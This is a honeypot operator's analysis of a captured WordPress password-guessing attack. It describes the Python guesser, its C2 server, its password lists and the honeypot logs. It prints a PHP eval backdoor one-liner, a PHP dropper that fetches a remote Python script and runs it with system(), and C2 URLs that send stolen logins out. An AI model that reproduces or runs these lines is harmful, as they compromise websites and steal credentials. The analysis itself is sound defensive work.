Skip to content

Latest commit

 

History

History

120.229.163.49-2018-10-28a

Python Password Guesser

A PHP program that runs a Python program that enumerates WordPress user IDs, then tries to guess a working password for each user ID. The Python program reports any working user ID and password combos to 118.184.47.13. Uses xmlrpc.php to guess passwords rather than the wp-login.php human-friendly URL. Smart.

It appears that sites which the Python program guesses a user ID/password are then recruited into guessing more user ID/password combos.

Origin

IP Address 120.229.163.49

I looked up 120.229.163.49 on 2018-11-04, about 6 days after this code arrived. The information may be stale

120.229.163.49 has no reverse lookup.

whois says:

irt:            IRT-CHINAMOBILE-CN
address:        China Mobile Communications Corporation
address:        29, Jinrong Ave., Xicheng District, Beijing, 100032
route:          120.224.0.0/12
descr:          China Mobile communications corporation
origin:         AS9808
mnt-by:         MAINT-CN-CMCC
last-modified:  2008-11-05T07:40:19Z

Last-modified date of 2008-11-05T07:40:19Z means I looked this up in UTC-0700 just after it was modified.

Download

Attackers downloaded to URL ending in "/wp-content/themes/twentytwelve/404.php". They used HTTP method POST, and gave a singe parameter named "dd". "dd" had an associated value of a string with PHP source code in it.

I assume the attackers meant for the code to execute in one of the myriad of one-liner back doors. I find it very common to see plugin edits or theme uploads that would insert code like this:

<?php @eval($_POST['dd']);?><?php
/** 
 * @package Akismet
 */ 
/*  
...

That would execute the PHP of this attack perfectly.

Deobfuscation

I did no real deobfuscation, but I should explain how I got the Python source code. The PHP source code consisted of a single line:

file_put_contents("805399.py",file_get_contents("http://118.184.47.13:38080/mywww/netok/dir.py"));$a = system("python 805399.py", $status);print_r($a);print_r($status);

This downloads a Python file, executes it, then sends the output of the python program and its exit status back to the invoker.

file_put_contents("805399.py",file_get_contents("http://118.184.47.13:38080/mywww/netok/dir.py"));
$a = system("python 805399.py", $status);
print_r($a);
print_r($status);

I modified the code to get the python file, but not execute it.

Analysis

There's hardly any PHP to speak of, but the Python program it downloads seems interesting.

Sequence of actions

  1. Request contents of http://118.184.47.13:38080/mywww/tests/counter.txt. This was just a string representation of a number. I got "7996" and "9142" when I tried this URL.
  2. Request contents of http://118.184.47.13:38080/mywww/tests/'+'allNUMBER.txt, where NUMBER is the string it got in step (1). These contents comprised MS-DOS text-file-format domain names. I downloaded the contents 3 times: all7996.txt, all7997.txt, all9142.txt, getting 3 differ batches of domain names.
  3. Request contents of http://118.184.47.13:38080/mywww/tests/num.php. It does nothing with the results of that request, I suspect it's a callback that verifies the Python program is working.
  4. Append all of the domain names from step (2) on a FIFO queue.
  5. Remove all files in directory "." (current working directory) that have names ending in ".py" or ".pyc" suffixes. This makes the Python code's source file unavailable for further access by other processes.
  6. Start 230 threads, each running function scaner.
  7. Main thread deletes files in current working directory (".") that have names with ".txt" or ".py" suffixes. Seems a little redundant with step (5), except this will also get rid of files full of domain names downloaded in step (2).

Each thread running in function scaner:

  1. Tries to fill a 40-element queue of its own with domain names from the queue of domain names from step (4) above. If the main queue of domain names has no elements, print the phrase "di yi ge dui le man le alll!!!!!!1111111AAAABBBBBBBB".

  2. For each domain name in its own queue, run function get_usernamelist() with the domain name and the digits 1 - 4. Function get_usernamelist() tries to get all posts made by the author number, and parse out the WordPress user ID of that author.

  3. For each of up to 3 user IDs obtained in step (2), create a password list, mainly from an internal list of passwords, but including the user ID, user ID+user ID, and each of the internal passwords concatenated with the user ID. That's for each of the user IDs it finds in step (2).

  4. Put each of those passwords on a FIFO queue. Put part of the domain name on to that queue. For example, if this thread is attempting to guess WordPress passwords on host "www.something.com", put "something" on the queue. Put each of another list of 118 passwords on the queue. Put combinations of user ID and hostname on the queue. The queue end up with about 400 passwords in it.

  5. For each of the user IDs, and each of the passwords, try to log in to WordPress via the /xmlrpc.php URL, apparently the "wp.getUsersBlogs" method.

  6. Should the thread stumble on a user ID and password that allows an XMLRPC login, send the user ID/password combo to:

    http://118.184.47.13:38080/mywww/data.php?name=pytestokpy700test2.txt&data=$SITE/wp-login.php,$USERID,$PASSWORD

and

http://118.184.47.13:38080/mywww/data.php?name=pytestokpyv2v700test2yanshijianyin5testkkkk.txt&data=$SITE/wp-login.php,$USERID,$PASSWORD

and also print the password and user ID on stdout, which the small PHP program that delivers the Python will end up returning to the invoker. 7. Sleep for a random number between 1000 and 2000 of seconds. Presumably this keeps the Python program alive for any longer running threads. It seems sloppy.

Coding style

I don't have Python expertise, so my judgement of coding style is suspect. I do know that I can write harder-to-understand PHP than Python, but I can still write obscure Python. This code seems to have more commented-out code than is common for Python. It uses a 4-space indent, rather than tabs or 2-space indents. The first few lines appear dodgy:

import urllib
import re
import urllib2
import sys
import base64

# !/usr/bin/python
# coding=utf-8
import urllib2
import urllib

The code re-imports urllib and urlib2. It also looks like the first 6 lines comprise a later addition to an already existing piece of Linux code. The # !/usr/bin/python is a mistake: I don't believe a Linux (or any Unix) kernel would execute a Python interpreter with that extra space character in it.

Combined with other aspects of the code, like assuming "." names the current working directory, it looks like this Python was written to execute under Linux or other Unix-like OSes, but not Windows.

The code does have some unused pieces. A variable named ip_list gets initialized with address like 127.0.0.1, 8.8.8.8, 8.8.4.4, which causes me to think it's a list of IP addresses to avoid, but it does not get used. There's a function joomalexp that's never called. It appears to try to run an object-deserialization exploit against Joomla CMSes, but as it's not invoked...

Referer

The code uses a Referer string of "http://www.google.com.hk" for XMLRPC calls. My server has recorded 4754 HTTP requests made with that string, from 2017-07-24 01:24:06-06 to 2018-10-17 11:20:12-06.

User Agent

The code sends a User Agent string of "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36". My server has recorded 6281 HTTP requests possessing that string from 2015-04-15 01:19:10-06 to 2018-10-17 11:20:12-06.

My server has recorded 4754 requests with that combo of user agent and referer, from 2017-07-24 01:24:06-06 to 2018-10-17 11:20:12-06.

IP Address HTTP requests First seen Last appearance
61.119.116.19 3197 2018-10-09 23:23:52-06 2018-10-14 14:09:29-06
91.200.12.9 1518 2018-02-27 06:48:13-07 2018-03-16 15:17:11-06
198.27.69.191 8 2018-10-17 10:51:20-06 2018-10-17 11:20:12-06
91.211.88.234 4 2018-09-20 05:06:56-06 2018-09-20 21:04:51-0
69.197.147.130 4 2017-09-08 12:18:35-06 2017-09-09 20:16:21-0
86.110.117.213 4 2018-08-23 02:09:45-06 2018-08-23 07:02:29-0
120.229.163.101 4 2018-03-07 18:59:25-07 2018-03-07 19:01:43-0
5.188.136.72 2 2018-07-05 03:24:38-06 2018-07-05 03:24:50-0
94.23.251.169 2 2018-10-08 03:39:29-06 2018-10-08 03:39:33-0
107.150.63.170 2 2017-07-24 01:24:06-06 2017-07-24 02:36:29-0
120.229.163.53 2 2018-09-20 00:06:28-06 2018-09-20 00:06:29-0
5.188.136.151 2 2018-07-12 20:46:25-06 2018-07-12 20:46:49-0
120.229.163.114 2 2018-09-20 10:55:07-06 2018-09-20 10:55:09-0
173.208.148.218 2 2017-09-21 17:36:44-06 2017-09-21 17:36:45-0
45.77.123.166 1 2017-10-21 11:42:45-06 2017-10-21 11:42:45-0

It looks like 91.200.12.9 did WordPress password guessing along with a little user ID enumeration against my WordPress honey pot. 61.119.116.19 did a single access of the WordPress login page, then proceeded straight to password guessing.

My WordPress honey pot acts like it will allow you to look up all posts by a given author number. Author 1 is usually the WordPress admin user. My honey pot generates random strings for other user IDs, but puts an "a2" prefix on user ID 2's random string. 91.200.12.9 used "admin" and several "a2"-prefixed user IDs, so whatever software did use the results of user ID enumeration in further password guessing.

Odd HTTP header

It looks like the Python code would put a header on its request that usually accompanies proxied HTTP requests:

X-Forwarded-For:  8.8.8.8

That's Google's public DNS server IP address.

Unfortunately, I don't keep track of most of the goofy headers that come my server's way. It seems weird enough that I thought I might mention it.

Domain Lists

I retrieved the http://118.184.47.13:38080/mywww/tests/counter.txt URL's contents 7 times. I lost the first number, but I got numbers and downloaded corresponding domain name lists 6 times.

Timestamp Number File of names number of names
2018-10-28T11:44-0600 7996 all7996.txt 10769
2018-10-29T22:29-0600 7997 all7997.txt 10769
2018-11-03T21:40-0600 9142 all9142.txt 2297
2018-11-04T11:51-0700 5324 all5324.txt 2400
2018-11-04T11:52-0700 5324 all5324.txt 2400
2018-11-04T12:05-0700 5411 all5411.txt 2297

Doing "5324" twice was just to see if the number made a difference or not. It seems to: the "5324" files are identical.

230 threads times 40 domain names per thread = 9200 domain names. Some threads will get 2 groups of 40 domain names to guess on for the larger 10769 name files. Most of the threads get no domain names for the smaller files.

Files all7996.txt and all7997.txt share only one domain name, "host60.onesourcepsg.com". No other domain names are shared between any two files.

I'm not sure I can see a purpose for the method of getting a number from http://118.184.47.13:38080/mywww/tests/counter.txt, then turning around and using that number to download a batch of domain names. It's possible that the numbers are something like hash buckets for the domain names. Any domain name that's had a guessing pass comes out of its bucket, all the while new hosts are added to the buckets. This seems like the hard way to try to guarantee password guessing on all the host names you've got.

Password Lists

The Python source code contains two different lists of passwords.

  1. 118 passwords used as-is.
  2. 265 passwords to concatenat with user name, which the code calls fuzzlist.

There's 80 passwords of 118 not in the "fuzzlist", and 229 fuzzlist passwords not in the list of plain passwords, so there's some overlap.

Since IP address 61.119.116.19 seems to have the most accesses, it's worth looking closer. I keep a Postgres database of all web accesses of my server.

Access No. Timestamp Bytes sent Path part of URL
4 2018-10-09T23:24:10-06 18229 //?author=1
460 2018-10-10T06:24:02-06 15641 //?author=2
916 2018-10-10T15:25:06-06 0 //?author=3
917 2018-10-10T15:25:56-06 0 //?author=4
918 2018-10-10T15:26:18-06 0 //?author=5
920 2018-10-14T02:45:33-06 18229 //?author=1
1376 2018-10-14T04:58:48-06 15715 //?author=2
1832 2018-10-14T07:26:10-06 15696 //?author=3
2288 2018-10-14T10:05:57-06 15695 //?author=4
2744 2018-10-14T12:17:17-06 15674 //?author=5

My WordPress honey pot always gives out "admin" as the user ID of author #1, and composes a random string with "a2" prefix for author #2. It randomly decides on other authors, up to author #10. you can see that access numbers 4 through 918 are checking author numbers sequentially up to 5, just like the Python code described here does. The honey pot gave back no bytes for authors 3, 4, 5. There are 454 login attempts between accesses 4 and 460, and 455 login attempts between 460 and 916. Between accesses 1376 and 1832, there are 455 login attempts, 455 login attempts between accesses 2288 and 1832, and 456 attempts between accesses 2744 and 2288. That matches with the password lists in this Python code, and how the code combines some password lists with user IDs.

Unfortunately, my honey pot's xmlrpc.php is not up to the task of recording the passwords that got sent in, so I can't verify that the same list got used.

IP Address 118.184.47.13

The command and control for this Python program has an IP address of 118.184.47.13.

118.184.47.13 has no reverse lookup 2018-11-04.

whois says:

inetnum:        118.184.0.0 - 118.184.63.255
netname:        ANCHNET
descr:          Shanghai Anchnet Network Technology Stock Co.,Ltd
country:        CN
admin-c:        CJ2546-AP
tech-c:         JY3624-AP
last-modified:  2017-12-11T03:07:27Z
irt:            IRT-CNISP-CN
address:        Beijing CNISP Technology Co., Ltd
last-modified:  2017-05-03T07:08:38Z

Nothing obvious connects it to the attacking IP address 120.229.163.49

nmap thinks that Microsoft Windows Server 2003 SP2 runs on that IP address.